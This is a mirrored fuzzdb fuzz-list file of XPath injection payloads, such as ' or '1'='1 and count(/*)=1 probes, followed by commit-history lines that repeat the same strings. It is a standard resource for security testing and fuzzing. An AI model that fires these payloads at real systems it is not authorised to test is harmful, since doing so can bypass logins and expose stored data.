fuzzdb/attack/xpath/xpath-injection.fuzz.txt

mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-11-23 11:33:04 +00:00
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
push all 2010-04-17 21:32:31 +00:00			`' or '1'='1`
			`' or ''='`
			`x' or 1=1 or 'x'='y`
			`/`
			`//`
			`//*`
			`/`
			`@*`
			`count(/child::node())`
			`x' or name()='username' or 'x'='y`
added some xpath payloads 2014-12-18 15:38:13 +00:00			`' and count(/*)=1 and '1'='1`
			`' and count(/@*)=1 and '1'='1`
			`' and count(/comment())=1 and '1'='1`